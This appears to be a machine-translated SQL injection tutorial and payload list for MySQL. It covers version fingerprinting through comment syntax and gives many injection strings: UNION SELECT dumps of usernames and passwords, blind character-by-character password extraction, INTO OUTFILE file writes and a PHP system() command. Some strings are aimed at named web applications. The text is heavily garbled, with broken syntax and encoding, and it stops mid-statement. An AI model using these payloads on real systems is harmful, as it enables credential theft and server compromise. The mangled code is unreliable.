For the purpose of this example, MySQL seems to be a majority of databases used on this network. Similar technologies may also apply to others. In each SQL statement, there is a "unique feature of that product ". MySQL allows comment usage in SQL entries:
Select * slave table/* foo */
In MySQL, there is an extension of which MySQL code can be inserted in the method:
Select /*! SQL _NO_CACHE */Slave table
The comments show that the above comments treat each database except MySQL. MySQL to have a look in the comments and may change his behavior. For example, if MySQL is version 4.0.0 or higher:
Select /*! 40000 SQL _NO_CACHE */Slave table
This may be extremely useful for the Penetration Tester for discovering that the database is in use and his version is blind:
Try
Http: // foo/web. php? Table = 38-we get the normal Screen
Http: // foo/web. php? Table = 38/* % 20 s */-We get the normal Screen
Http: // foo/web. php? Table = 38 /*! % 20 s */-We get an exception screen because of syntactic errors in comments-MySQL is in use
Http: // foo/web. php? Table = 38 /*! 30000% 20 s */-We get an exception screen, MySQL is at least 3. x. x
Http: // foo/web. php? Table = 38 /*! 40000% 20 s */-We get an exception screen, MySQL is at least 4. x. x
Http: // foo/web. php? Table = 38 /*! 50000% 20 s */-We get the normal screen, MySQL is under 5.x. x
Http: // foo/web. php? Table = 38 /*! 40020% 20 s */-We get the normal screen, MySQL is under 4.0.20
Http: // foo/web. php? Table = 38 /*! 40017% 20 s */-We get an exception screen, MySQL is at least 4.0.17
Http: // foo/web. php? Table = 38 /*! 40018% 20 s */-We get the normal screen, MySQL is under 4.0.18
We can conclude that MySQL runs on site 4.0.17.
This is useful information because we may then know which exploits/vulnerabilities to try again. MySQL instances, such as Series 3. x. x, 4. x. x, and 5. x. x, provide other functions.
In addition, independent ideas. Most systems have not changed in this study. Check the default behavior of the MySQL database engine:
Mysql> select 9e0;
+ ----- +
| 9e0 |
+ ----- +
| 9 |
+ ----- +
1 column in the Set (0.02 seconds)
Mysql> select 9e2;
+ ----- +
| 9e2 |
+ ----- +
| 1, 900 |
+ ----- +
1 column in the Set (0.00 seconds)
Most language interpreters are trying to guess that something is related to their input. This input is confirmed against the width and pass. In this way, we can freely query a database in 9e9 on the backend. PHP users are often advised to use is_int ($ _ GET [foo]). This does not block this method from being internal as it is, and it is only 3 characters long. But it may take your database server down.
Tonu has a good penetration test case when there is almost impossible to receive any error message from this system. Finally, Tonu tries to send a 9e999 message somewhere as the line space is particularly large, similar to 30 seconds of "PHP pause in something. inc" input. Who operates for penetration testing knows how important any information is about the system internals. Tonu is able to download the company file with extremely large numbers of missing lines of space and inject it into the classic statement Summary
Or 1 = 1
Or 1 = 1
/*
% 23
And password = mypass
Id =-1 union select 1, 1
Id =-1 union select char (97), char (97), char (97)
Id = 1 union select 1, 1 from members
Id = 1 union select 1, 1 from admin
Id = 1 union select 1, 1 from user
Userid = 1 and password = mypass
Userid = 1 and mid (password, 112) = char)
Userid = 1 and mid (password, 4, 1) = char (97)
And ord (mid (password, 111)> (the ord function is very useful and can return an integer)
And LENGTH (password) = 6 (LENGTH of the probe password)
And LEFT (password, 1) = m
And LEFT (password, 2) = my
.............................. And so on
Union select 1, username, password from user /*
Union select 1, username, password from user /*
= Union select 1, username, password from user/* (can be 1 or = followed directly)
99999 union select 1, username, password from user /*
Into outfile c:/file.txt (export file)
= Or 1 = 1 into outfile c:/file.txt
1 union select 1, username, password from user into outfile c:/user.txt
SELECT password FROM admins WHERE login = John into dumpfile/path/to/site/file.txt
Id = union select 1, username, password from user into outfile
Id =-1 union select 1, database (), version () (flexible application query)
Commonly used query test statement,
SELECT * FROM table WHERE 1 = 1
SELECT * FROM table WHERE uuu = uuu
SELECT * FROM table WHERE 1 <> 2
SELECT * FROM table WHERE 3> 2
SELECT * FROM table WHERE 2 <3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1 + 1
SELECT * FROM table WHERE 1--1
SELECT * FROM table where isnull (NULL)
SELECT * FROM table where isnull (COT (0 ))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE B BETWEEN a AND c
SELECT * FROM table WHERE 2 IN (0, 1, 2)
SELECT * FROM table where case when 1> 0 THEN 1 END
For example, the night cat Download System Version 1.0
Id = 1 union select, 1
Union select, 1 from ymdown_user
Union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1
Id = 10000 union select, 1 from ymdown_user where id = 1 and groupid = 1
Union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace, look for a password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49 (verify the First password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 50 (second digit)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password,) = 51
..................................................................
Example 2: gray track transformation id test (meteor)
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, user (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2013) % 20 order % 20by % 20 eventdate
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, pass (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2010) % 20 order % 20by % 20 eventdate
Construction statement:
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, 1 from user where userid = 1)
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, username, password from user where userid = 1)
UNION % 20 (SELECT % ,,0, 205-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid % 20 = %) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid = 13465) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, userid % 20 FROM % 20 user % 20 WHERE % 20 username = sandflee) % 20 order % 20by % 20 eventdate (check the sand id)
(SELECT a FROM table_name WHERE a = 10 and B = 1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid = $ id union select * FROM ...... (You can directly submit fields in the same circumstances as the database)
SELECT * FROM article WHERE articleid = $ id union select 1, 1, 1, 1 FROM ...... (In different cases)
Special tips: Write in forms, search engines, and other places:
"___"
". _"
"%
% Order by articleid /*
% Order by articleid #
_ Order by articleid /*
_ Order by articleid #
$ Command = "dir c:"; system ($ command );
SELECT * FROM article WHERE articleid = $ id
SELECT * FROM article WHERE articleid = $ id
1 and 1 = 2 union select * from user where userid = 1 /*
(SELECT * FROM article WHERE articleid = 1 and 1 = 2 union select * from user where userid = 1 /*)
1 and 1 = 2 union select * from user where userid = 1
Statement format: Create a database, insert:
Create database 'inobjection'
Create table 'user '(
'Userid' int (11) not null auto_increment,
'Username' varchar (20) not null default,